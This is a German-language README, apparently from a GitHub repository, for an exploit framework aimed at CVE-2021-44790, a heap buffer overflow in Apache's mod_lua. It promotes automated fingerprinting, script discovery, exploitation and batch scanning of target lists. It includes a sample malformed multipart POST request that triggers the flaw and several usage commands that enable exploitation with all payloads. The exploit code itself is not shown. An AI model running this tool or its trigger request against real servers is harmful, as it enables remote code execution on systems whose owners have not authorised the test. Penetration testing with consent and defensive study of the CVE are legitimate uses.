🔥 CVE-2021-44790 - Apache mod_lua Pufferüberlauf-Ausnutzung
📋 Überblick
Apache mod_lua Pufferüberlauf-Ausnutzung ist eine fortschrittliche Exploitation-Plattform der Enterprise-Klasse für CVE-2021-44790 – eine kritische Pufferüberlauf-Schwachstelle im mod_lua-Modul des Apache HTTP Servers 2.4.x. Dieses Framework bietet umfassendes Fingerprinting, intelligente Skript-Ermittlung, mehrstufiges Scannen und professionelle Berichtsfunktionen mit 95%+ Erkennungssicherheit.
⚡ Hauptfunktionen
| Funktion | Beschreibung |
|---|
| 🔍 Erweitertes Fingerprinting | Erkennung von Apache-Version, mod_lua, Betriebssystem, Architektur, WAF, CDN, Container und Cloud-Anbieter |
| 🎯 Intelligente Ermittlung | 7+ Ermittlungstechniken, darunter robots.txt, Sitemap, HTML-Parsing und JavaScript-Extraktion |
| 💥 Mehrstufiges Scannen | Verbindung → Fingerprint → Ermittlung → Verifizierung → Exploitation → Berichtserstellung |
| 🧩 Erweiterbares Plugin-System | Einfache Plugin-Entwicklung für zukünftige CVEs |
| 🌐 Intelligente HTTP-Engine | Verbindungspooling, Wiederholungsversuche, HTTP/2-Unterstützung, Ratenbegrenzung |
| 📊 Umfassende Berichte | JSON, HTML, Markdown, PDF mit interaktiven Dashboards |
| 🎨 Attraktive Terminal-Oberfläche | Rich-Bibliothek mit Fortschrittsbalken, Tabellen und farbcodierter Ausgabe |
| 💾 Forschungsdatenbank | SQLite-Speicherung mit vollständigem Scan-Verlauf und Abfrageunterstützung |
| 📸 Screenshot-Erfassung | Automatische Webseiten-Screenshots zur Beweissicherung |
| 🚀 Hohe Leistung | 20+ parallele Threads, 100+ Verbindungspools |
🎯 Schwachstellendetails
| Attribut | Wert |
|---|
| CVE-ID | CVE-2021-44790 |
| Schwachstelle | Pufferüberlauf (Integer-Unterlauf) |
| Betroffene Software | Apache HTTP Server 2.4.0 bis 2.4.51 |
| Behobene Version | Apache HTTP Server 2.4.52 und später |
| Komponente | mod_lua-Modul |
| Angriffsvektor | Netzwerk (Remote) |
| CVSS-Score | 9.8 (Kritisch) |
| Auswirkung auf Vertraulichkeit | Hoch |
| Auswirkung auf Integrität | Hoch |
| Auswirkung auf Verfügbarkeit | Hoch |
| Exploit-Reife | Proof-of-Concept verfügbar |
Technische Beschreibung
Die Schwachstelle befindet sich im mod_lua-Modul bei der Verarbeitung von multipart/form-data-Anfragen. Ein Integer-Unterlauf in der Funktion lua_request_parsebody() kann zu einem Heap-basierten Pufferüberlauf führen, der potenziell eine Remote-Code-Ausführung ermöglicht.
POST /process.lua HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=4
4
Content-Disposition: form-data; name="name"
0
4
📸 Screenshots
| Hauptoberfläche | Fingerprint-Ergebnisse |
|---|
 |  |
| Scan-Fortschritt | HTML-Berichts-Dashboard |
|---|
 |  |
🚀 Schnellstart
Installation
# Clone the repository
git clone https://github.com/CerberusMrXi/Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790
cd Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790
# Install dependencies
pip install -r requirements.txt
# Verify installation
python3 exploit.py --version
Grundlegende Verwendung
# Quick vulnerability scan
python3 exploit.py http://target.com
# Verbose scan with exploitation
python3 exploit.py https://target.com --exploit --verbose
# Generate all reports
python3 exploit.py http://target.com --report all
# Research mode with database
python3 exploit.py http://target.com --research
📋 Detaillierte Verwendung
Kommandozeilenoptionen
python3 exploit.py [TARGET] [OPTIONS]
| Option | Beschreibung | Beispiel |
|---|
TARGET | Ziel-URL | http://target.com |
--config FILE | Konfigurationsdatei | --config config.yaml |
--threads N | Anzahl der Threads | --threads 30 |
--timeout N | Anfrage-Timeout (Sekunden) | --timeout 15 |
--proxy URL | Proxy-URL | --proxy http://127.0.0.1:8080 |
--verbose | Ausführliche Ausgabe | --verbose |
--scan-only | Scan ohne Exploitation | --scan-only |
--exploit | Exploitation aktivieren | --exploit |
--all-payloads | Alle Payloads verwenden | --all-payloads |
--report FORMAT | Berichtsformat (json/html/markdown/all) | --report all |
--output DIR | Ausgabeverzeichnis | --output /path/to/reports/ |
--research | Forschungsmodus aktivieren | --research |
--database FILE | Datenbankpfad | --database luastorm.db |
--screenshot | Screenshots aufnehmen | --screenshot |
--batch FILE | Batch-Datei mit Zielen | --batch targets.txt |
--query SQL | Datenbankabfrage ausführen | --query "SELECT * FROM targets" |
Beispiele
1. Grundlegende Schwachstellenbewertung
python3 exploit.py https://example.com --verbose --report all
2. Scan in einer Unternehmensumgebung
python3 exploit.py https://internal-server.com \
--proxy http://proxy.corp.com:8080 \
--threads 10 \
--timeout 15 \
--verbose \
--report all \
--output /var/log/security/
3. Vollständiger Penetrationstest
python3 exploit.py https://client.com \
--threads 30 \
--timeout 10 \
--exploit \
--all-payloads \
--report all \
--screenshot \
--research \
--verbose \
--output /pentest/client_name/
4. Batch-Scanning
python3 exploit.py --batch targets.txt --config config.yaml
5. Datenbankabfragen
# Show all vulnerable targets
python3 exploit.py --query "SELECT * FROM targets WHERE vulnerable=1"
# Get statistics
python3 exploit.py --query "SELECT COUNT(*) as total, SUM(vulnerable) as vulnerable FROM targets"
⚙️ Konfiguration
config.yaml
# ----------------------------------------------------------------------------
# LuaStorm Exploit Framework - Configuration File
# ----------------------------------------------------------------------------